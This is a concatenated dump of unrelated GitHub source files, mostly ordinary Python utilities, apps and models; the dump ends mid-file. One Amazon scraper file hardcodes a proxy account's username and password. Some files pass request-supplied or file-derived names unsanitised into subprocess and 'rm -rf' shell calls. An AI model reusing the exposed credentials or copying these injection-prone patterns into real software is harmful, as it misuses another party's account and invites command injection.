+{"seq_id":"9272931726","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# Created by Charles on 2018/6/20\r\n# Function: A simple example for using init_log_config()\r\n\r\nfrom log_config.log_config import init_log_config\r\nimport logging\r\nlogger = logging.getLogger(__name__)\r\n\r\n\r\ndef produce_log():\r\n\r\n logger.debug(\"this is a message of debug level.\")\r\n logger.info(\"this is a message of info level.\")\r\n logger.error(\"this is a message of error level\")\r\n\r\n\r\ndef test():\r\n try:\r\n # raise()\r\n a = 5 / 0\r\n except Exception as e:\r\n logger.exception(\"this is a message of error level\\n e={}\".format(e))\r\n\r\n\r\nif __name__ == '__main__':\r\n init_log_config()\r\n produce_log()\r\n test()\r\n","repo_name":"AIRob/Huobi","sub_path":"test_code/log_test.py","file_name":"log_test.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28357940926","text":"import numpy as np\nimport itertools\nimport random\nimport math\n\nfrom tasks.tree_dataset import TreeDataset\nimport common\n\n\nclass DictionaryLookupDataset(TreeDataset):\n def __init__(self, depth):\n super(DictionaryLookupDataset, self).__init__(depth)\n\n def get_combinations(self):\n # returns: an iterable of [key, permutation(leaves)]\n # number of combinations: (num_leaves!)*num_choices\n num_leaves = len(self.leaf_indices)\n num_permutations = 1000\n max_examples = 32000\n\n if self.depth > 3:\n per_depth_num_permutations = min(num_permutations, math.factorial(num_leaves), max_examples // num_leaves)\n permutations = [np.random.permutation(range(1, num_leaves + 1)) for _ in\n range(per_depth_num_permutations)]\n else:\n permutations = random.sample(list(itertools.permutations(range(1, num_leaves + 1))),\n min(num_permutations, math.factorial(num_leaves)))\n\n return itertools.chain.from_iterable(\n\n zip(range(1, num_leaves + 1), itertools.repeat(perm))\n for perm in 
permutations)\n\n def get_nodes_features(self, combination):\n # combination: a list of indices\n # Each leaf contains a one-hot encoding of a key, and a one-hot encoding of the value\n # Every other node is empty, for now\n selected_key, values = combination\n\n # The root is [one-hot selected key] + [0 ... 0]\n nodes = [ (selected_key, 0) ]\n\n for i in range(1, self.num_nodes):\n if i in self.leaf_indices:\n leaf_num = self.leaf_indices.index(i)\n node = (leaf_num+1, values[leaf_num])\n else:\n node = (0, 0)\n nodes.append(node)\n return nodes\n\n def label(self, combination):\n selected_key, values = combination\n return int(values[selected_key - 1])\n\n def get_dims(self):\n # get input and output dims\n in_dim = len(self.leaf_indices)\n out_dim = len(self.leaf_indices)\n return in_dim, out_dim\n","repo_name":"tech-srl/bottleneck","sub_path":"tasks/dictionary_lookup.py","file_name":"dictionary_lookup.py","file_ext":"py","file_size_in_byte":2121,"program_lang":"python","lang":"en","doc_type":"code","stars":86,"dataset":"github-code","pt":"53"} +{"seq_id":"18969020480","text":"import csv\nimport pickle\nimport pprint\n\nimport numpy as np\n\nfrom p1_data_to_boolean import write_data, data_stats\n\n# Class names -> numbers\ncls_dict = {'republican': 0, 'democrat': 1}\n\n\ndef read_votedata(path):\n \"\"\"Reading data and changing 'y' to 1, 'n' to 0 and the missing values to randomly selected 1 or 0. The class names\n also have been changed to {republican, democrat} -> {0, 1} and moved to the last column\"\"\"\n with open(path, 'r') as dataset:\n csv_reader = csv.reader(dataset)\n data_set = []\n\n for row in csv_reader:\n tmp_row = []\n for value in row[1:]:\n if value == 'y':\n tmp_row.append(1)\n elif value == 'n':\n tmp_row.append(0)\n elif value == '?':\n np.random.seed(0)\n tmp_row.append(np.random.randint(2))\n\n tmp_row.append(cls_dict[row[0]])\n data_set.append(tmp_row)\n\n return np.array(data_set)\n\n\ndef main():\n vote_data = read_votedata('input_files/house-votes-84.csv')\n\n # Writing the new converted data list into a file\n write_data('input_files/boolean_files/bool_votedata.csv', vote_data)\n\n vote_cov, vote_means, vote_std = data_stats(vote_data)\n\n # dumping dataset into output to be used in the Winnow2 and Bayes programs\n vote_data_set = {\n 'vote_data': vote_data,\n }\n\n with open('vote_data_set.pkl', 'wb') as output:\n pickle.dump(vote_data_set, output)\n\n print(\"Covariance is:\")\n pprint.pprint(vote_cov)\n print('\\nMean is: ')\n pprint.pprint(vote_means)\n print('\\nSandard Deviation is: ')\n pprint.pprint(vote_std)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"NazaninYari/ML_Projects","sub_path":"bayes_classifier_vs_winnow2/src/p1_votedata_cleansing.py","file_name":"p1_votedata_cleansing.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1311101939","text":"import random\nfrom bs4 import BeautifulSoup\n\nimport requests\n\n\nuser_agents = [\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0\",\n # \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36\",\n # \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5.1 Safari/605.1.15\"\n # \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.41\",\n # \"Mozilla/5.0 
(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36\"\n]\n\nheaders = {\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\",\n \"Accept-Encoding\": \"gzip, deflate, br\",\n \"Accept-Language\": \"en-US,en;q=0.5\",\n \"Connection\": \"keep-alive\",\n \"DNT\": \"1\",\n \"Host\": \"www.amazon.com\",\n \"Sec-Fetch-Dest\": \"document\",\n \"Sec-Fetch-Mode\": \"navigate\",\n \"Sec-Fetch-Site\": \"cross-site\",\n \"TE\": \"trailers\",\n \"Upgrade-Insecure-Requests\": \"1\",\n \"User-Agent\": random.choice(user_agents),\n}\n\nhttp_proxy = \"http://kayjitsu:auMYDwfm8Su4K0ph@proxy.packetstream.io:31112\"\nhttps_proxy = \"http://kayjitsu:auMYDwfm8Su4K0ph@proxy.packetstream.io:31112\"\n\nproxy_dict = {\n \"http\": http_proxy,\n \"https\": https_proxy,\n}\n\n\nclass RequestHandler:\n def __init__(self, url, headers=headers, proxies=proxy_dict, params=None):\n self.url = url\n self.headers = headers\n self.params = params\n self.proxies = proxies\n\n def send_get_request(self):\n try:\n response = requests.get(self.url, headers=self.headers, params=self.params, proxies=self.proxies)\n return response\n except:\n return None\n\n\n def process_response(self, response):\n if response:\n if response.status_code == 200:\n return response\n else:\n return None\n\n def get_soup(self, response):\n soup = BeautifulSoup(response.content, \"html.parser\")\n soup.prettify()\n return soup\n\n\nclass IngestHandler:\n def __init__(self, url_list: list):\n self.asins_list = url_list\n\n def ingest_asins(self):\n pass","repo_name":"chrismartinio/reviewtrail","sub_path":"handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":2300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4954984008","text":"from time import sleep\nfrom shelljob import proc\nfrom pathlib import Path\nfrom flask import render_template\nfrom flask import jsonify\nfrom flask import request\nfrom flask import Response\nfrom flask import flash, url_for, redirect\nfrom werkzeug.utils import secure_filename\nfrom app import app\nfrom .cfg import hubInterface\nfrom .cfg import usbHubInterface\nimport random\nimport string\nimport sys\nimport os\n\n\n\n\ndef index_contents_update():\n not_in_use_text = \"Not In Use\"\n #show slots with < 54 mA as no board present to filter out the noise of unpopualted slots - 1bit = 13.3mA\n # so 4 bits is 53.2m\n if hubInterface.get_port_1_current() < 54:\n slot1_current = not_in_use_text\n slot1_power = not_in_use_text\n else:\n slot1_current = '{:02.1f}mA'.format(hubInterface.get_port_1_current())\n slot1_power = '{:02.2f}W'.format(hubInterface.get_port_1_power())\n \n if hubInterface.get_port_2_current() < 54:\n slot2_current = not_in_use_text\n slot2_power = not_in_use_text\n else:\n slot2_current = '{:02.1f}mA'.format(hubInterface.get_port_2_current())\n slot2_power = '{:02.2f}W'.format(hubInterface.get_port_2_power())\n \n if hubInterface.get_port_3_current() < 54:\n slot3_current = not_in_use_text\n slot3_power = not_in_use_text\n else:\n slot3_current = '{:02.1f}mA'.format(hubInterface.get_port_3_current())\n slot3_power = '{:02.2f}W'.format(hubInterface.get_port_3_power())\n \n if hubInterface.get_port_4_current() < 54:\n slot4_current = not_in_use_text\n slot4_power = not_in_use_text\n else:\n slot4_current = '{:02.1f}mA'.format(hubInterface.get_port_4_current())\n slot4_power = '{:02.2f}W'.format(hubInterface.get_port_4_power())\n\n 
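# assemble the formatted readings into the context used by the index template and JSON endpoint\n    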
templateData = {\n 'slot_1_current' : slot1_current,\n 'slot_2_current' : slot2_current,\n 'slot_3_current' : slot3_current,\n 'slot_4_current' : slot4_current,\n 'slot_1_power' : slot1_power,\n 'slot_2_power' : slot2_power,\n 'slot_3_power' : slot3_power,\n 'slot_4_power' : slot4_power,\n 'mains_current' : '{:02.1f}mA'.format(hubInterface.get_mains_current()),\n 'mains_power' : '{:02.2f}W'.format(hubInterface.get_mains_power()),\n 'board_voltage' : '{:02.2f}V'.format(hubInterface.get_board_voltage())\n }\n return templateData\n\n@app.route('/')\n@app.route('/index', methods=['GET', 'POST'])\ndef index():\n return render_template('index.html', **index_contents_update())\n\n@app.route('/current_miner_info.json')\ndef current_hub_info():\n return jsonify(index_contents_update())\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in {'hex'}\n\n@app.route('/firmwareupdate', methods=['GET', 'POST'])\ndef firmwareupdate():\n if request.method == 'POST':\n # check if the post request has the file part, if not then its come from the complete button\n if 'file' not in request.files:\n #restart hub after update\n hubInterface.resume_after_firmware_update()\n return render_template('firmwareupdate.html')\n #got a file name, so save the file local for flashing \n file = request.files['file']\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n #mark hub for firmware update\n hubInterface.clear_prog_loaded_bootloader_flag()\n return render_template('firmwareupdate-progress.html', **{'filename':filename})\n else:\n return render_template('firmwareupdate.html')\n\n@app.route('/resetbutton.json', methods=['GET', 'POST'])\ndef resetbutton():\n if request.method == 'POST':\n print(\"Performing hard reset for slot \" + request.json['slot'])\n #power cycle the requested slot \n usbHubInterface.change_power_state(int(request.json['slot']))\n sleep(0.5)\n usbHubInterface.change_power_state(int(request.json['slot']))\n return \"nothing\"\n\n@app.route('/firmware_update_stream')\ndef firmware_update_stream():\n\n filename = os.path.join(app.config['UPLOAD_FOLDER'], request.args.get(\"filename\"))\n #give a short period to allow the file to be updloaded\n escape_count = 0\n while not Path(filename).is_file():\n if escape_count > 5:\n break\n escape_count += 1\n sleep(0.5)\n \n g = proc.Group()\n p = g.run([\"python3\", os.path.join(app.config['UPLOAD_FOLDER'],\"update_firmware.py\"), \"-H \" + filename])\n\n def read_process():\n while g.is_pending():\n lines = g.readlines()\n for proc, line in lines:\n yield \"data:\" + str(line, 'utf-8') + \"\\n\\n\"\n \n yield \"data: finished\\n\\n\"\n \n read_proc_op = read_process()\n return Response(read_proc_op,mimetype='text/event-stream')\n\n","repo_name":"neilbirtles/SBC-Cluster-Board","sub_path":"Frontend/app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":4776,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"2635039203","text":"import os\nimport sys\nimport warnings\nimport pkgutil\nimport inspect\nimport py_compile\nimport pprint\n\n\nclass Bundles (object) :\n \n def __init__(self, path=None, bundelType=None) :\n \n if not path :\n warnings.warn ('class \\\"Bundles\\\" argument \\\"path\\\" None or emty') \n \n if not bundelType :\n warnings.warn ('class \\\"Bundles\\\" argument \\\"bundelType\\\" None or emty')\n \n self.bundleType = 
bundelType \n self.bundlePath = path \n \n\n def createBundles (self):\n \n warnings.warn ('work in progress')\n\n \n def getValidBundles (self) : \n \n bundles = collectBundles (self.bundlePath, self.bundleType) \n return bundles\n \n \n def getPythonBundles (self, exculeFolders) :\n \n bundles = collectValidBundles (self.bundlePath, exculeFolders)\n return bundles\n\n\ndef collectBundles (path, bundleType):\n \n if not path :\n warnings.warn ('Function \\\"getBundles\\\" argument \\\"path\\\" None or emty')\n \n if not os.path.isdir(path) :\n warnings.warn ('{} - No such directory'.format(path))\n \n bundleData = {} \n \n for module_loader, name, ispkg in pkgutil.iter_modules([path]) : \n loader = module_loader.find_module(name) \n \n module = loader.load_module (name)\n print (module_loader, name, module)\n \n if not hasattr(module, 'TYPE') :\n continue\n \n if module.TYPE!=bundleType and module.TYPE!='None':\n continue \n \n moduleMembers = {} \n for moduleName, value in inspect.getmembers (module) : \n moduleMembers.setdefault (moduleName, value) \n \n bundleData.setdefault (module, moduleMembers)\n \n return bundleData\n\n\ndef reorder (data, key) :\n \n result = {}\n\n ing = 0\n for eachKey, eachValue in data.items () :\n \n #=======================================================================\n # if key not in eachValue :\n # continue\n #=======================================================================\n \n if eachValue[key] : \n ing = eachValue[key]\n \n if not eachValue[key] : \n ing+=1\n \n if eachValue[key] in result :\n ing = eachValue[key] + 1 \n \n result.setdefault(ing, eachKey)\n \n return result \n\n\ndef collectValidBundles (path, exculeFolders):\n \n '''\n Description\n Type - standalone function\n To validate the python code. 
\n \n :param path exxample 'Z:\\packages'\n :param exculeFolders example ['resources', 'plugins', 'bin', 'icons']\n \n :return result example { 'validModules', {currentFile, 'True'},\n 'unvalidModules', {currentFile, str(reult)}} \n '''\n \n validResult = { 'validModules': {},\n 'unvalidModules': {}}\n \n for root, dirs, files in os.walk (path): \n for eachFile in files:\n currentFile = os.path.abspath(os.path.join(root, eachFile)) \n exists = True\n \n for eachExclude in exculeFolders:\n if currentFile.startswith (os.path.abspath(os.path.join(path, eachExclude))) :\n exists = False\n continue \n \n if not exists :\n continue \n if not currentFile.endswith('.py'): \n continue \n \n try : \n #module_loader = imp.load_source('', currentFile)\n py_compile.compile(currentFile) \n validResult.setdefault('validModules', {currentFile, 'True'})\n \n except Exception as compailResult: \n validResult.setdefault('unvalidModules', {currentFile, str(compailResult)})\n \n print ('validModules', currentFile, 'True')\n \n return validResult\n\n#End############################################################################","repo_name":"subing85/packages_test","sub_path":"module/collectBundels.py","file_name":"collectBundels.py","file_ext":"py","file_size_in_byte":4498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27199446702","text":"\"\"\"Command-line interface for the iTEM databases.\"\"\"\nfrom pathlib import Path\nfrom textwrap import indent\n\nimport click\n\nfrom item.historical.cli import historical\nfrom item.model.cli import model\nfrom item.remote.cli import remote\n\n\n@click.group(help=__doc__)\n@click.option(\n \"--path\",\n \"paths\",\n type=(str, click.Path()),\n multiple=True,\n metavar=\" \",\n help=\"Override data paths (multiple allowed).\",\n)\ndef main(paths):\n from item.common import init_paths\n\n paths = {k.replace(\"_\", \" \"): v for (k, v) in paths}\n\n init_paths(**paths)\n\n\n@main.command()\ndef help():\n \"\"\"Show extended help for the command-line tool.\"\"\"\n print(__doc__, end=\"\\n\\n\")\n print(\n \"\"\"This tool takes configuration options in one of two ways:\n\n1. From a file named item_config.yaml in the current directory. For\n instance, to override the path to the raw model data, put the\n following in item_config.yaml:\n\n path:\n 'model raw': ../custom/data/location\n\n2. From command-line options. 
For instance, give the following:\n\n $ ./run --path model_raw ../custom/data/location COMMAND\n\nUnderscores are converted to spaces automatically.\n\nIn a Python script, the following is equivalent:\n\n import item\n item.init_paths(model_raw='../custom/data/location')\n …\n\"\"\"\n )\n\n\n@main.command()\ndef debug():\n \"\"\"Show debugging information, including paths.\"\"\"\n import yaml\n\n from item.common import config, paths\n\n dump_args = dict(indent=2, default_flow_style=False)\n\n def _dump(data):\n print(indent(yaml.dump(data, **dump_args), \" \"))\n\n print(\"Configuration file: %s\" % config.get(\"_filename\", \"none\"))\n _dump(config.get(\"_from_file\", {}))\n\n print(\"Command-line overrides:\")\n _dump(config.get(\"_cli\", {}))\n\n print(\"Paths:\")\n _dump(paths)\n\n\n@main.command()\n@click.option(\"--dry-run\", \"-n\", is_flag=True, help=\"Only show what would be done.\")\n@click.argument(\"path\", type=click.Path())\ndef mkdirs(path, dry_run):\n \"\"\"Create a directory tree for the database.\"\"\"\n from item.common import make_database_dirs\n\n make_database_dirs(path, dry_run)\n\n\n@main.command()\ndef template():\n \"\"\"Generate the MIP submission template.\"\"\"\n from item.structure import make_template\n\n make_template()\n\n\n@main.command(\"update-dsd\")\ndef update_dsd():\n \"\"\"Generate the iTEM SDMX data structures.\n\n The file item/data/structure.xml is updated.\n \"\"\"\n import sdmx\n\n from item.structure import generate\n\n with open(Path(__file__).parent / \"data\" / \"structure.xml\", \"wb\") as f:\n f.write(sdmx.to_xml(generate(), pretty_print=True))\n\n\nmain.add_command(model)\nmain.add_command(historical)\nmain.add_command(remote)\n","repo_name":"transportenergy/database","sub_path":"item/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":2700,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"53"} +{"seq_id":"75320706728","text":"\nimport src.return_data as return_data\nimport os\nfrom src.settings import *\nimport src.runAI.transition_detection\nfrom src.return_data import *\nfrom src.messages import *\nfrom src.discord_rpc import *\nimport os\nfrom modules.commands import *\nfrom cv2 import VideoCapture, CAP_PROP_FRAME_WIDTH, CAP_PROP_FRAME_HEIGHT, CAP_PROP_FPS, CAP_PROP_FRAME_COUNT\n\nimport src.thisdir\nthisdir = src.thisdir.thisdir()\nhomedir = os.path.expanduser(r\"~\")\nfrom PyQt5.QtCore import QThread\nimport src.workers as workers\n\n\n \ndef initializeUpscale(self,AI):#1st stage in preparing render, starts all worker threads\n try:\n if self.input_file != '':\n settings = Settings()\n os.system(f'rm -rf \"{settings.RenderDir}/{self.videoName}_temp/\"')\n self.ui.logsPreview.clear()\n \n self.render='esrgan'\n self.AI = AI\n \n self.setDisableEnable(True)\n \n if settings.DiscordRPC == 'Enabled':\n try:\n start_discordRPC(self,'Upscaling')\n except:\n print('No discord on this machine')\n \n realESRGAN_Model = self.ui.Rife_Model.currentText()\n realESRGAN_Times = self.ui.Rife_Times.currentText()[0]\n if AI == 'realesrgan-ncnn-vulkan':\n if realESRGAN_Model == 'Default':\n self.realESRGAN_Model = '-n realesrgan-x4plus -s 4'\n \n if realESRGAN_Model == 'Animation':\n self.realESRGAN_Model = f'-n realesr-animevideov3 -s {realESRGAN_Times}'\n else:\n self.realESRGAN_Model = f'-n {self.ui.Rife_Model.currentText()} -s {realESRGAN_Times}'\n \n self.ui.logsPreview.append(f'[Extracting Frames]')\n self.ui.ETAPreview.setText('ETA:')\n self.ui.processedPreview.setText('Files 
Processed:')\n \n self.upscaleThread = QThread()\n # Step 3: Create a worker object\n \n self.upscaleWorker = workers.upscale(self) \n \n\n \n\n # Step 4: Move worker to the thread\n self.upscaleWorker.moveToThread(self.upscaleThread)\n # Step 5: Connect signals and slots\n self.upscaleThread.started.connect(self.upscaleWorker.finishRenderSetup)\n self.upscaleWorker.finished.connect(self.upscaleThread.quit)\n self.upscaleWorker.finished.connect(self.upscaleWorker.deleteLater)\n self.upscaleThread.finished.connect(self.upscaleThread.deleteLater)\n self.upscaleWorker.log.connect(self.addLinetoLogs)\n self.upscaleWorker.removelog.connect(self.removeLastLineInLogs)\n self.upscaleWorker.finished.connect(self.endRife)\n # Step 6: Start the thread\n \n self.upscaleThread.start()\n self.runPB()\n else:\n self.showDialogBox(no_input_file)\n except Exception as e:\n log(e)\n self.showDialogBox(e)\ndef start_upscale(self,AI): # command linked directly to upscale buttons \n try: \n if self.input_file != '':\n self.render='esrgan'\n has_enough_space,predicted_space,total_space = checks.check_if_enough_space(self.input_file,self.render,self.times)\n \n if has_enough_space:\n initializeUpscale(self,AI)\n elif not_enough_storage(self,predicted_space,total_space):\n initializeUpscale(self,AI)\n else:\n pass\n \n else:\n no_input_file(self)\n \n except Exception as e:\n traceback_info = traceback.format_exc()\n log(f'ERROR: {e} {traceback_info}')\n self.showDialogBox(e)\n ","repo_name":"TNTwise/REAL-Video-Enhancer","sub_path":"modules/upscale.py","file_name":"upscale.py","file_ext":"py","file_size_in_byte":3849,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"42945934778","text":"############################################\n# singleton_basic_3.py\n# 根据书上的java代码改写\n############################################\n\nclass Singleton(object):\n\t__uniqueInstance = None\n\n\tdef __create(cls, *args, **kwargs):\n\t\treturn object.__new__(cls, *args, **kwargs)\n\n\t@classmethod\n\tdef getInstance(cls, *args, **kwargs):\n\t\tif cls.__uniqueInstance is None:\n\t\t\tcls.__uniqueInstance = cls.__create(cls, *args, **kwargs)\n\t\treturn cls.__uniqueInstance\n\n\nif __name__ == '__main__':\n\ta = Singleton.getInstance()\n\tb = Singleton.getInstance()\n\tprint(id(a),id(b))\n\tassert id(a) == id(b)","repo_name":"weiwang-linda/design_pattern","sub_path":"singleton_chapter5/singleton_basic_3.py","file_name":"singleton_basic_3.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15535717097","text":"import json\nfrom models import Authors, Quotes\n\nwith open(\"quotes.json\", \"r\", encoding='utf-8') as f:\n q_data = json.load(f)\n\n\nfor item in q_data:\n a_name = item[\"author\"]\n q_author = Authors.objects(fullname=a_name).first()\n quote = Quotes(\n tags=item[\"tags\"],\n author=q_author,\n quote=item[\"quote\"]\n )\n quote.save()","repo_name":"Dmytro-Kruhlov/goit-hw-8","sub_path":"add_quotes.py","file_name":"add_quotes.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39547800347","text":"from .orm import start_mappers\n\nfrom sqlalchemy.ext.asyncio import create_async_engine, AsyncSession\nfrom sqlalchemy.orm import sessionmaker\n\n\nclass DatabaseManager():\n \"\"\"Class for database management.\"\"\"\n\n def __init__(self, url: str) -> None:\n 
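# register the SQLAlchemy ORM mappings (see .orm.start_mappers) before the engine and session are built\n        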
start_mappers()\n\n self.engine = create_async_engine(url)\n\n base_session_factory = sessionmaker(\n bind=self.engine,\n class_=AsyncSession,\n )\n\n self.session: AsyncSession = base_session_factory()\n\n async def close(self) -> None:\n await self.session.close()\n","repo_name":"LEv145/DiscordMusicBot","sub_path":"src/music_bot/database/database_manager.py","file_name":"database_manager.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30762569593","text":"from typing import Any, Dict\nfrom nicegui import ui\nimport uuid\n\n\nclass Setting_object():\n def __init__(self,headers,data = None):\n self.headers = headers\n print(\"new object \",data)\n self._data = data\n pass\n def update(self,data):\n print(\"update\",data)\n return\n def to_card(self,headers):\n print(\"to_card\",headers)\n itr = iter(self._data)\n for h in headers:\n ui.label(h.get_name())\n ui.label(next(itr))\n\n def load_edit(self,edit_items):\n itr = iter(self._data)\n for h in self.headers:\n print(h)\n edit_items[h.id].value=next(itr)\n return\n\n def __str__(self):\n o1 = []\n itr = iter(self._data)\n for h in self.headers:\n print(h)\n o1.append(\"%s : %s\"%(h.get_name(),next(itr)))\n return \"[%s]\"%\",\".join(o1)\nclass Setting_Header():\n def __init__(self,name,description):\n print(name,description)\n self._name = name\n self._desc = description\n self.id = uuid.uuid4().hex\n def to_edit_primary_key(self):\n i = ui.input()\n i.set_visibility(False)\n return i\n def to_edit_string(self):\n return ui.input(self._name)\n def to_edit_enum(self):\n s1 = ui.select(self._desc[\"values\"])\n return s1\n def to_edit_number(self):\n return ui.number(self._name)\n def get_name(self):\n return self._name\n\n def to_edit_item(self):\n tmp_name = \"to_edit_\"+self._desc[\"type\"]\n if hasattr(self,tmp_name):\n return getattr(self,tmp_name)()\n\n return ui.label(f\"?{tmp_name}\")\nclass Setting_Model_Descriptor():\n def __init__(self,name,headers):\n self.name = name\n self.headers = headers\n self.lists = []\n return\n def get_objects(self):\n print(\"get_objects\")\n return self.lists\n def get_headers(self):\n print(\"get_headers\")\n return self.headers\n def create(self,data):\n print(\"create\",data)\n new_data = []\n for h in self.headers:\n print(h,h.id,data[h.id])\n new_data.append(data[h.id].value)\n new_obj = Setting_object(self.get_headers(),new_data)\n self.lists.append(new_obj)\n return new_obj\n\n def remove(self,obj):\n self.lists.remove(obj)\n def set_new(self,edit_items):\n for h in self.headers:\n edit_items[h.id].value= None\ndef model_factory(model):\n headers = []\n for h in model[\"items\"]:\n print(h,model[\"items\"][h])\n headers .append(Setting_Header(h,model[\"items\"][h]))\n return Setting_Model_Descriptor(model[\"model_name\"],headers)\n\n\ndef ui_factory(objects):\n ui.label(\"this page is for setting\")\n factory_name = objects.name\n dialog_object = {\"value\":{},\"object\":None}\n\n def create() -> None:\n open_dialog(None)\n display_list.refresh()\n\n ui.button(f'Add new {factory_name}', on_click=create)\n\n @ui.refreshable\n def display_list():\n for obj in objects.get_objects():\n print(obj)\n with ui.card():\n with ui.row().classes('justify-between w-full'):\n obj.to_card(objects.get_headers())\n with ui.row():\n ui.button('edit', on_click=lambda _, obj=obj: open_dialog(obj))\n ui.button('delete', on_click=lambda _, obj=obj: delete(obj), color='red')\n display_list()\n def update() -> 
None:\n # max_id = objects[0][0] if len(objects) > 0 else 0\n # print(\"H\",objects,dialog_object[\"value\"])\n # dialog_id = dialog_object[\"value\"][\"id\"]\n # for itm in objects:\n # print(\"V\",itm)\n # if itm[0] > max_id:\n # max_id = itm[0]\n # if itm[0] == dialog_id:\n # itm[1] = dialog_object[\"value\"][\"name\"].value\n # itm[2] = dialog_object[\"value\"][\"age\"].value\n if dialog_object[\"object\"] is None:\n new_obj = objects.create(dialog_object[\"value\"])\n ui.notify(f'Create new {factory_name} {new_obj}')\n else:\n dialog_object[\"object\"].update(dialog_object[\"value\"])\n ui.notify(f'Updated {factory_name} {dialog_object[\"object\"]}')\n dialog.close()\n display_list.refresh()\n\n with ui.dialog() as dialog:\n with ui.card():\n for obj_desc in objects.get_headers():\n dialog_object[\"value\"][obj_desc.id]=obj_desc.to_edit_item()\n # dialog_object[\"value\"][\"id\"] = None\n # dialog_object[\"value\"][\"name\"] = ui.input('Name')\n # dialog_object[\"value\"][\"age\"] = ui.number('Age', format='%.0f')\n # dialog_name = ui.input('Name')\n # dialog_age = ui.number('Age', format='%.0f')\n with ui.row():\n ui.button('Save', on_click=update)\n ui.button('Close', on_click=dialog.close).props('outline')\n\n\n def delete(obj: Dict[str, Any]) -> None:\n objects.remove(obj)\n ui.notify(f'Deleted {factory_name} {obj}')\n display_list.refresh()\n\n def open_dialog(obj: Dict[str, Any]) -> None:\n print(obj)\n dialog_object[\"object\"]=obj\n if obj:\n obj.load_edit(dialog_object[\"value\"])\n else:\n objects.set_new(dialog_object[\"value\"])\n dialog.open()\n\n return\n\n\n\n\n\n","repo_name":"Bamdad-rar/NiceguiSimpleAdminPanel","sub_path":"sections/setting/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5406,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"72095857448","text":"from unicodedata import name\nimport uuid\nfrom django.db import models\nfrom user_manager.models import User\n\n\n\n\nclass Product(models.Model):\n id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)\n name = models.CharField(max_length=255,)\n code = models.CharField(max_length=255,)\n quantity = models.IntegerField()\n reorder_min = models.IntegerField()\n status = models.CharField(max_length=255, default=\"INSTOCK\")\n added_by = models.ForeignKey(\n User, on_delete=models.CASCADE, related_name=\"added_by\"\n )\n date_created = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n db_table = \"products\"\n\n def __str__(self):\n return str(self.name)\n \nclass Reorder(models.Model):\n id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)\n product = models.ForeignKey(\n Product, on_delete=models.CASCADE, related_name=\"product_reordered\"\n )\n status = models.CharField(max_length=255, default=\"PENDING\")\n cleared_by = models.ForeignKey(\n User, on_delete=models.CASCADE, related_name=\"cleared_by\",\n null=True, blank=True\n )\n date_cleared = models.DateTimeField(null=True, blank=True)\n date_created = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n db_table = \"reordered\"\n\n def __str__(self):\n return str(self.product.name)\n","repo_name":"arllence/value8-backend","sub_path":"core/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5463073900","text":"import random\nimport os\nimport glob\nimport numpy as np\nimport 
